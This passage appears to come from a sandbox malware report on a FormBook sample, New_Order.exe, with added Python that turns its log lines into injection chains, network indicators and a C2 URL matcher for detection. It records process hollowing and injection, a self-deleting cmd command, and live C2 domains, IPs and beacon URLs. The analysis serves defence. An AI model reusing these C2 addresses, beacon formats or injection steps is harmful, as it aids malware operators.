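    """Per process: distinct functions touching the TEB, total reads, registers used."""
    acc = defaultdict(lambda: {"functions": set(), "reads": 0, "registers": Counter()})
    for r in records:
        s = acc[r["process"]]
        s["functions"].add(r["function"])
        s["reads"] += 1
        s["registers"][r["register"]] += 1
    return {
        p: {"functions": sorted(s["functions"]), "reads": s["reads"],
            "registers": dict(s["registers"])}
        for p, s in acc.items()
    }


# Constructed subset of the report lines above (the last line is not a hit).
SAMPLE = r"""
Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03952581 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03952581 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039A6DC9 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exeCode function: 7_2_04869080 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_048FB8D0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe | Process token adjusted: Debug
"""

if __name__ == "__main__":
    for proc, s in summarize(parse_peb_reads(SAMPLE)).items():
        print(f"{proc}: {len(s['functions'])} functions, {s['reads']} reads, {s['registers']}")
```

          Run against the full listing, the summary gives the number of distinct functions per injected process that take the PEB pointer; the same functions recurring under both svchost.exe and wscript.exe (same low address bits, different base) is consistent with one payload mapped into each host rather than two different code bases.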

          HIPS / PFW / Operating System Protection Evasion:

          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exe | Domain query: www.charmboutiques.com
          Source: C:\Windows\explorer.exe | Domain query: www.shanghainternational.com
          Source: C:\Windows\explorer.exe | Network Connect: 91.148.168.141 80
          Source: C:\Windows\explorer.exe | Domain query: www.voiceclubdubai.com
          Source: C:\Windows\explorer.exe | Network Connect: 23.227.38.74 80
          Source: C:\Windows\explorer.exe | Domain query: www.websitemax.co.uk
          Source: C:\Windows\explorer.exe | Network Connect: 8.210.40.49 80
          Source: C:\Windows\explorer.exe | Network Connect: 150.95.255.38 80
          Source: C:\Windows\explorer.exe | Domain query: www.roastedorganic.com
          Source: C:\Windows\explorer.exe | Domain query: www.year-action.xyz
          Source: C:\Windows\explorer.exe | Domain query: www.susanestuart.com
          Source: C:\Windows\explorer.exe | Network Connect: 75.2.115.196 80
          Source: C:\Windows\explorer.exe | Network Connect: 62.149.189.71 80
          Source: C:\Windows\explorer.exe | Domain query: www.w-c727or.net
          Source: C:\Windows\explorer.exe | Domain query: www.kantan-sedori.com
          Source: C:\Windows\explorer.exe | Domain query: www.geacasolaro.com
          Source: C:\Windows\explorer.exe | Domain query: www.hdjakdhf.com
          Source: C:\Windows\explorer.exe | Network Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exe | Network Connect: 85.233.160.22 80
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\New_Order.exeSection loaded: unknown target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: unknown target: C:\Windows\SysWOW64\wscript.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: unknown target: C:\Windows\SysWOW64\wscript.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Windows\SysWOW64\svchost.exeThread register set: target process: 3472
          Source: C:\Windows\SysWOW64\wscript.exeThread register set: target process: 3472
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Windows\SysWOW64\svchost.exeThread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing techniqueShow sources
          Source: C:\Windows\SysWOW64\svchost.exeSection unmapped: C:\Windows\SysWOW64\wscript.exe base address: 1260000
          Writes to foreign memory regionsShow sources
          Source: C:\Users\user\Desktop\New_Order.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2EEB008
          Source: C:\Users\user\Desktop\New_Order.exeProcess created: C:\Windows\SysWOW64\svchost.exe 'C:\Users\user\Desktop\New_Order.exe'
          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\SysWOW64\svchost.exe'
          Source: explorer.exe, 00000002.00000000.253797902.0000000005EA0000.00000004.00000001.sdmp, wscript.exe, 00000007.00000002.496298573.0000000003290000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000002.00000000.241804697.0000000001640000.00000002.00000001.sdmp, wscript.exe, 00000007.00000002.496298573.0000000003290000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000002.00000000.241804697.0000000001640000.00000002.00000001.sdmp, wscript.exe, 00000007.00000002.496298573.0000000003290000.00000002.00000001.sdmpBinary or memory string: SProgram Managerl
          Source: explorer.exe, 00000002.00000002.495816911.0000000001128000.00000004.00000020.sdmpBinary or memory string: ProgmanOMEa
          Source: explorer.exe, 00000002.00000000.241804697.0000000001640000.00000002.00000001.sdmp, wscript.exe, 00000007.00000002.496298573.0000000003290000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd,
          Source: explorer.exe, 00000002.00000000.241804697.0000000001640000.00000002.00000001.sdmp, wscript.exe, 00000007.00000002.496298573.0000000003290000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\New_Order.exeCode function: 0_2_00403348 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
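The signature lines in this section describe a chain of cross-process writes (New_Order.exe into svchost.exe; svchost.exe into explorer.exe and wscript.exe; wscript.exe back into explorer.exe) and the network contacts made from the injected explorer.exe. The following is an added example, not part of the Joe Sandbox report and not the sandbox's own code, showing how an analyst would turn such lines into an injection graph and a network IOC list. The regular expressions and the unmap-plus-map hollowing heuristic are this example's assumptions about the line format; the input lines are excerpts copied from this section.

```python
"""Turn sandbox behaviour-signature lines into an injection chain and network IOCs.

Added example; not part of the Joe Sandbox report. The parsing rules below are
this example's own assumptions about the report's line format.
"""
import re
from collections import defaultdict

# Excerpt of report lines as they appear after text extraction (the report runs
# the "Source:" path straight into the event text). Constructed from this page.
SAMPLE_LINES = [
    "Source: C:\\Windows\\explorer.exeDomain query: www.charmboutiques.com",
    "Source: C:\\Windows\\explorer.exeNetwork Connect: 91.148.168.141 80",
    "Source: C:\\Windows\\explorer.exeNetwork Connect: 23.227.38.74 80",
    "Source: C:\\Users\\user\\Desktop\\New_Order.exeSection loaded: unknown target: C:\\Windows\\SysWOW64\\svchost.exe protection: execute and read and write",
    "Source: C:\\Windows\\SysWOW64\\svchost.exeSection loaded: unknown target: C:\\Windows\\explorer.exe protection: execute and read and write",
    "Source: C:\\Windows\\SysWOW64\\svchost.exeSection loaded: unknown target: C:\\Windows\\SysWOW64\\wscript.exe protection: execute and read and write",
    "Source: C:\\Windows\\SysWOW64\\wscript.exeSection loaded: unknown target: C:\\Windows\\explorer.exe protection: read write",
    "Source: C:\\Windows\\SysWOW64\\svchost.exeThread APC queued: target process: C:\\Windows\\explorer.exe",
    "Source: C:\\Windows\\SysWOW64\\svchost.exeSection unmapped: C:\\Windows\\SysWOW64\\wscript.exe base address: 1260000",
    "Source: C:\\Users\\user\\Desktop\\New_Order.exeMemory written: C:\\Windows\\SysWOW64\\svchost.exe base: 2EEB008",
    "Source: C:\\Windows\\SysWOW64\\wscript.exeProcess created: C:\\Windows\\SysWOW64\\cmd.exe /c del 'C:\\Windows\\SysWOW64\\svchost.exe'",
]

# The source path runs straight into the event keyword, so split on the keyword
# (assumed keyword list; extend it for other event types).
EVENT_RE = re.compile(
    r"^Source: (?P<src>.+?)"
    r"(?P<kind>Domain query|Network Connect|Section loaded|Section unmapped|"
    r"Thread APC queued|Memory written|Process created): (?P<rest>.*)$"
)
WIN_PATH_RE = re.compile(r"[A-Za-z]:\\[^\s']+\.exe")
INJECT_KINDS = {"Section loaded", "Thread APC queued", "Memory written", "Section unmapped"}


def parse_line(line):
    """Return (source_path, event_kind, remainder) or None for an unrecognised line."""
    m = EVENT_RE.match(line)
    return (m.group("src"), m.group("kind"), m.group("rest")) if m else None


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def network_iocs(lines):
    """Domains and ip:port pairs, keyed by the process image that reached out."""
    iocs = defaultdict(set)
    for line in lines:
        ev = parse_line(line)
        if not ev:
            continue
        src, kind, rest = ev
        if kind == "Domain query":
            iocs[basename(src)].add(rest.strip())
        elif kind == "Network Connect":
            ip, port = rest.split()
            iocs[basename(src)].add(f"{ip}:{port}")
    return {proc: sorted(v) for proc, v in iocs.items()}


def injection_edges(lines):
    """Directed (source, target, technique) edges for every cross-process write."""
    edges = set()
    for line in lines:
        ev = parse_line(line)
        if not ev or ev[1] not in INJECT_KINDS:
            continue
        src, kind, rest = ev
        m = WIN_PATH_RE.search(rest)
        if m:
            edges.add((basename(src), basename(m.group(0)), kind))
    return sorted(edges)


def injection_chain(edges, start):
    """Processes reachable from the initial sample, in breadth-first (hop) order."""
    order, seen, queue = [], {start}, [start]
    while queue:
        node = queue.pop(0)
        order.append(node)
        for target in sorted({t for s, t, _ in edges if s == node}):
            if target not in seen:
                seen.add(target)
                queue.append(target)
    return order


def hollowing_candidates(edges):
    """Heuristic (this example's own): a source that both unmaps a section in a
    target and maps a new section into the same target is hollowing it."""
    by_pair = defaultdict(set)
    for s, t, kind in edges:
        by_pair[(s, t)].add(kind)
    return sorted(pair for pair, kinds in by_pair.items()
                  if {"Section unmapped", "Section loaded"} <= kinds)


if __name__ == "__main__":
    edges = injection_edges(SAMPLE_LINES)
    print("chain:", " -> ".join(injection_chain(edges, "new_order.exe")))
    print("hollowed:", hollowing_candidates(edges))
    print("iocs:", network_iocs(SAMPLE_LINES))
```

On the excerpt above the chain resolves to new_order.exe, svchost.exe, explorer.exe, wscript.exe, with svchost.exe flagged as hollowing wscript.exe, and every network IOC attributed to explorer.exe, which is the point of the "System process connects to network" signature: the image that talks to the C2 is not the one that was executed.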

Stealing of Sensitive Information:

Yara detected FormBook
Source: Yara match | File source: 00000000.00000002.240328103.00000000024E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.494703247.0000000000610000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.277382659.0000000002DD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.277759385.00000000035D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.495776656.0000000001120000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.495702077.00000000010F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.277108812.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.New_Order.exe.24e0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.New_Order.exe.24e0000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected FormBook
Source: Yara match | File source: 00000000.00000002.240328103.00000000024E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.494703247.0000000000610000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.277382659.0000000002DD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.277759385.00000000035D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.495776656.0000000001120000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.495702077.00000000010F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.277108812.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.New_Order.exe.24e0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.New_Order.exe.24e0000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

(Bracketed digits are the count badges the report attaches to a technique, kept verbatim. Rows 4 to 6 have no Remote Service Effects entry.)

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Shared Modules [1] | Path Interception | Access Token Manipulation [1] | Virtualization/Sandbox Evasion [3] | OS Credential Dumping | Security Software Discovery [231] | Remote Services | Archive Collected Data [1] | Exfiltration Over Other Network Medium | Encrypted Channel [1] | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | System Shutdown/Reboot [1]
Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Process Injection [612] | Access Token Manipulation [1] | LSASS Memory | Virtualization/Sandbox Evasion [3] | Remote Desktop Protocol | Clipboard Data [1] | Exfiltration Over Bluetooth | Ingress Tool Transfer [3] | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Process Injection [612] | Security Account Manager | Process Discovery [2] | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol [3] | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Deobfuscate/Decode Files or Information [1] | NTDS | Remote System Discovery [1] | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol [13] | SIM Card Swap | - | Carrier Billing Fraud
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Obfuscated Files or Information [3] | LSA Secrets | File and Directory Discovery [2] | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | - | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Software Packing [1] | Cached Domain Credentials | System Information Discovery [13] | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | - | Abuse Accessibility Features

          Behavior Graph

Behavior Graph ID: 411746 | Sample: New_Order.exe | Startdate: 12/05/2021 | Architecture: WINDOWS | Score: 100

The graph, rendered as a process tree (bracketed numbers are the graph's count badges, kept verbatim):

Root node
  Signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Found malware configuration; Malicious sample detected (through community Yara rule); 8 other signatures
  DNS/IP nodes linked from the root: www.thelordnelsonwinthorpe.com; www.algaeflipflops.com
  -> New_Order.exe [18] (started)
       Dropped file: C:\Users\user\AppData\...\a9g5j8lkcs3.dll, PE32
       Signatures: Writes to foreign memory regions; Maps a DLL or memory area into another process
       -> svchost.exe (started)
            Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; 2 other signatures
            -> explorer.exe [6] (injected)
                 DNS/IP: voiceclubdubai.com 91.148.168.141:80 from local port 49717 (TELEPOINTBG, Bulgaria); fwd3.hosts.co.uk 85.233.160.22:80 from local port 49720 (ISIONUKNamescoLimitedGB, United Kingdom); 15 other IPs or domains
                 Signatures: System process connects to network (likely due to code injection or exploit); Performs DNS queries to domains with low reputation
                 -> wscript.exe (started)
                      Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
                      -> cmd.exe [1] (started)
                           -> conhost.exe (started)

          Screenshots


Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label
New_Order.exe | 39% | Virustotal | -
New_Order.exe | 18% | Metadefender | -
New_Order.exe | 60% | ReversingLabs | Win32.Trojan.SpyNoon
New_Order.exe | 100% | Joe Sandbox ML | -

Dropped Files

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\nshC36E.tmp\a9g5j8lkcs3.dll | 45% | ReversingLabs | Win32.Trojan.Pwsx

Unpacked PE Files

Source | Detection | Scanner | Label
0.2.New_Order.exe.24e0000.4.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
1.2.svchost.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
0.2.New_Order.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1130366
0.0.New_Order.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1130366

          Domains

          No Antivirus matches

URLs

Source | Detection | Scanner | Label
http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
http://www.geacasolaro.com/icsm/?b6jPH=FBZdWxvpgT&zZSlDz=7Y2cvYyrvfqxgunt3pZhUV8c5sAKyRnRxEqYxYZ4IV2yKeALIaVm9IYD5cxomw6uu8uh | 0% | Avira URL Cloud | safe
http://www.hdjakdhf.com/icsm/?b6jPH=FBZdWxvpgT&zZSlDz=TR2dy7NfXkcYQth3vstvigvFAK3lzNu6618cspSNEjM/3bTBgf6HWtuv8wkgUujUQhHp | 0% | Avira URL Cloud | safe
http://www.tiro.com | 0% | URL Reputation | safe
http://www.goodfont.co.kr | 0% | URL Reputation | safe
http://www.voiceclubdubai.com/icsm/?b6jPH=FBZdWxvpgT&zZSlDz=S3hZ9hucZB3EtOR58Q5nEiimGsTcBclBSgHOETXnBYv0klj7oHI8wHmFL3huZKvOqIBH | 0% | Avira URL Cloud | safe
http://www.carterandcone.coml | 0% | URL Reputation | safe
http://www.year-action.xyz/icsm/?zZSlDz=logo8bpUoQPWTQLlZghyT7WZQjxZBYpYOJDMMbKRF5+Nw+24xZrLdIoslO6i49yZrWE6&b6jPH=FBZdWxvpgT | 0% | Avira URL Cloud | safe
http://www.sajatypeworks.com | 0% | URL Reputation | safe
http://www.typography.netD | 0% | URL Reputation | safe
http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe
http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
http://fontfabrik.com | 0% | URL Reputation | safe
http://www.founder.com.cn/cn | 0% | URL Reputation | safe
http://www.websitemax.co.uk/icsm/?b6jPH=FBZdWxvpgT&zZSlDz=bWXej36VQHpcttmtRFRFltU4ahfDKjPxw8enIUkEUFX2dD9DLv700yN2zBLMaSA3vN4R | 0% | Avira URL Cloud | safe
http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe
http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
http://www.sandoll.co.kr | 0% | URL Reputation | safe
http://www.roastedorganic.com/icsm/?zZSlDz=zaS0K7Z6s3udRIV54ona/Y7FMvuM79U9hGlb72LKWqTP1QF33lUaB5+awkVfTrm4Szdf&b6jPH=FBZdWxvpgT | 0% | Avira URL Cloud | safe
http://www.urwpp.deDPlease | 0% | URL Reputation | safe
http://www.zhongyicts.com.cn | 0% | URL Reputation | safe
http://www.sakkal.com | 0% | URL Reputation | safe
www.voiceclubdubai.com/icsm/ | 0% | Avira URL Cloud | safe
http://www.susanestuart.com/icsm/?zZSlDz=LFJNa/qc3hvrLE0QUTB49n97WnaBmuBdNse4fNn2XI4P2ly5LcfV2yqmdABiPtDvfVQd&b6jPH=FBZdWxvpgT | 0% | Avira URL Cloud | safe

Domains and IPs

Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
www.roastedorganic.com | 75.2.115.196 | true | true | - | unknown
www.year-action.xyz | 150.95.255.38 | true | true | - | unknown
www.geacasolaro.com | 62.149.189.71 | true | true | - | unknown
voiceclubdubai.com | 91.148.168.141 | true | true | - | unknown
www.hdjakdhf.com | 8.210.40.49 | true | true | - | unknown
susanestuart.com | 34.102.136.180 | true | false | - | unknown
fwd3.hosts.co.uk | 85.233.160.22 | true | true | - | unknown
www.thelordnelsonwinthorpe.com | 94.136.40.51 | true | false | - | unknown
shops.myshopify.com | 23.227.38.74 | true | true | - | unknown
www.algaeflipflops.com | 64.190.62.111 | true | false | - | unknown
www.charmboutiques.com | unknown | unknown | true | - | unknown
www.shanghainternational.com | unknown | unknown | true | - | unknown
www.voiceclubdubai.com | unknown | unknown | true | - | unknown
www.websitemax.co.uk | unknown | unknown | true | - | unknown
www.susanestuart.com | unknown | unknown | true | - | unknown
www.w-c727or.net | unknown | unknown | true | - | unknown
www.kantan-sedori.com | unknown | unknown | true | - | unknown

Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://www.geacasolaro.com/icsm/?b6jPH=FBZdWxvpgT&zZSlDz=7Y2cvYyrvfqxgunt3pZhUV8c5sAKyRnRxEqYxYZ4IV2yKeALIaVm9IYD5cxomw6uu8uh | true | Avira URL Cloud: safe | unknown
http://www.hdjakdhf.com/icsm/?b6jPH=FBZdWxvpgT&zZSlDz=TR2dy7NfXkcYQth3vstvigvFAK3lzNu6618cspSNEjM/3bTBgf6HWtuv8wkgUujUQhHp | true | Avira URL Cloud: safe | unknown
http://www.voiceclubdubai.com/icsm/?b6jPH=FBZdWxvpgT&zZSlDz=S3hZ9hucZB3EtOR58Q5nEiimGsTcBclBSgHOETXnBYv0klj7oHI8wHmFL3huZKvOqIBH | true | Avira URL Cloud: safe | unknown
http://www.year-action.xyz/icsm/?zZSlDz=logo8bpUoQPWTQLlZghyT7WZQjxZBYpYOJDMMbKRF5+Nw+24xZrLdIoslO6i49yZrWE6&b6jPH=FBZdWxvpgT | true | Avira URL Cloud: safe | unknown
http://www.websitemax.co.uk/icsm/?b6jPH=FBZdWxvpgT&zZSlDz=bWXej36VQHpcttmtRFRFltU4ahfDKjPxw8enIUkEUFX2dD9DLv700yN2zBLMaSA3vN4R | true | Avira URL Cloud: safe | unknown
http://www.roastedorganic.com/icsm/?zZSlDz=zaS0K7Z6s3udRIV54ona/Y7FMvuM79U9hGlb72LKWqTP1QF33lUaB5+awkVfTrm4Szdf&b6jPH=FBZdWxvpgT | true | Avira URL Cloud: safe | unknown
www.voiceclubdubai.com/icsm/ | true | Avira URL Cloud: safe | low
http://www.susanestuart.com/icsm/?zZSlDz=LFJNa/qc3hvrLE0QUTB49n97WnaBmuBdNse4fNn2XI4P2ly5LcfV2yqmdABiPtDvfVQd&b6jPH=FBZdWxvpgT | false | Avira URL Cloud: safe | unknown
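Every full URL in the table above shares the path /icsm/ and the same two query parameters, b6jPH (value FBZdWxvpgT in every request) and zZSlDz (a different value in each), across seven unrelated domains; the URL reputation scanners nevertheless rate each one "safe", so the useful indicator is the shape of the request rather than any one domain. The following is an added example, not part of the report and not FormBook's own code, that derives that shape from the URL list and turns it into a matcher a proxy or IDS rule could implement. The clustering threshold, the output format and the matcher are this example's own assumptions; the URL list is copied from the table.

```python
"""Derive a C2 URL signature from a sandbox report's contacted-URL list.

Added example; not part of the Joe Sandbox report. The heuristic (same path,
same parameter names, at least one parameter with a constant value across
several hosts) is this example's own assumption about how to cluster C2 URLs.
"""
from collections import defaultdict
from urllib.parse import urlsplit

# The seven full URLs from the report's "Contacted URLs" table (copied input).
CONTACTED_URLS = [
    "http://www.geacasolaro.com/icsm/?b6jPH=FBZdWxvpgT&zZSlDz=7Y2cvYyrvfqxgunt3pZhUV8c5sAKyRnRxEqYxYZ4IV2yKeALIaVm9IYD5cxomw6uu8uh",
    "http://www.hdjakdhf.com/icsm/?b6jPH=FBZdWxvpgT&zZSlDz=TR2dy7NfXkcYQth3vstvigvFAK3lzNu6618cspSNEjM/3bTBgf6HWtuv8wkgUujUQhHp",
    "http://www.voiceclubdubai.com/icsm/?b6jPH=FBZdWxvpgT&zZSlDz=S3hZ9hucZB3EtOR58Q5nEiimGsTcBclBSgHOETXnBYv0klj7oHI8wHmFL3huZKvOqIBH",
    "http://www.year-action.xyz/icsm/?zZSlDz=logo8bpUoQPWTQLlZghyT7WZQjxZBYpYOJDMMbKRF5+Nw+24xZrLdIoslO6i49yZrWE6&b6jPH=FBZdWxvpgT",
    "http://www.websitemax.co.uk/icsm/?b6jPH=FBZdWxvpgT&zZSlDz=bWXej36VQHpcttmtRFRFltU4ahfDKjPxw8enIUkEUFX2dD9DLv700yN2zBLMaSA3vN4R",
    "http://www.roastedorganic.com/icsm/?zZSlDz=zaS0K7Z6s3udRIV54ona/Y7FMvuM79U9hGlb72LKWqTP1QF33lUaB5+awkVfTrm4Szdf&b6jPH=FBZdWxvpgT",
    "http://www.susanestuart.com/icsm/?zZSlDz=LFJNa/qc3hvrLE0QUTB49n97WnaBmuBdNse4fNn2XI4P2ly5LcfV2yqmdABiPtDvfVQd&b6jPH=FBZdWxvpgT",
]


def split_query(query):
    """Raw name/value pairs; deliberately no percent- or plus-decoding so the
    values compare exactly as they went over the wire."""
    pairs = []
    for part in query.split("&"):
        if part:
            name, _, value = part.partition("=")
            pairs.append((name, value))
    return pairs


def url_shape(url):
    """Path plus the sorted parameter names: parameter order varies per request."""
    u = urlsplit(url)
    return (u.path, tuple(sorted(name for name, _ in split_query(u.query))))


def c2_signatures(urls, min_hosts=3):
    """Group URLs by shape; a shape seen on at least min_hosts distinct hosts is
    reported with its constant and variable parameters."""
    groups = defaultdict(list)
    for url in urls:
        groups[url_shape(url)].append(url)
    signatures = []
    for (path, names), members in groups.items():
        hosts = sorted({urlsplit(u).hostname for u in members})
        if len(hosts) < min_hosts:
            continue
        values = defaultdict(set)
        for u in members:
            for name, value in split_query(urlsplit(u).query):
                values[name].add(value)
        constant = {n: next(iter(v)) for n, v in values.items() if len(v) == 1}
        signatures.append({
            "path": path,
            "params": list(names),
            "constant": constant,
            "variable": sorted(n for n in names if n not in constant),
            "hosts": hosts,
        })
    return signatures


def matches_signature(url, sig):
    """What a proxy or IDS rule built from the signature would check: exact
    path, exact parameter set, and the constant parameter values."""
    u = urlsplit(url)
    if u.path != sig["path"]:
        return False
    params = dict(split_query(u.query))
    return (sorted(params) == sorted(sig["params"])
            and all(params.get(n) == v for n, v in sig["constant"].items()))


if __name__ == "__main__":
    for sig in c2_signatures(CONTACTED_URLS):
        print(sig["path"], "constant:", sig["constant"], "variable:", sig["variable"])
        print("hosts:", ", ".join(sig["hosts"]))
```

Matching on the constant parameter b6jPH=FBZdWxvpgT together with the /icsm/ path is tighter than a path-only rule and survives the operator rotating domains, which is exactly what the list of seventeen contacted domains shows; it does not survive a rebuilt sample with a different constant, so treat the derived rule as sample-specific.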

URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://www.apache.org/licenses/LICENSE-2.0 | explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmp | false | - | high
http://www.fontbureau.com | explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmp | false | - | high
http://www.fontbureau.com/designersG | explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmp | false | - | high
http://www.fontbureau.com/designers/? | explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmp | false | - | high
http://www.founder.com.cn/cn/bThe | explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers? | explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmp | false | - | high
http://www.tiro.com | explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers | explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmp | false | - | high
http://nsis.sf.net/NSIS_ErrorError | New_Order.exe | false | - | high
http://www.goodfont.co.kr | explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
https://www.lcn.com/parked-domains/index?/=/domain/websitemax.co.uk | wscript.exe, 00000007.00000002.498023186.0000000004EF2000.00000004.00000001.sdmp | false | - | high
http://www.carterandcone.coml | explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.sajatypeworks.com | explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.typography.netD | explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/cabarga.htmlN | explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmp | false | - | high
http://www.founder.com.cn/cn/cThe | explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.galapagosdesign.com/staff/dennis.htm | explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
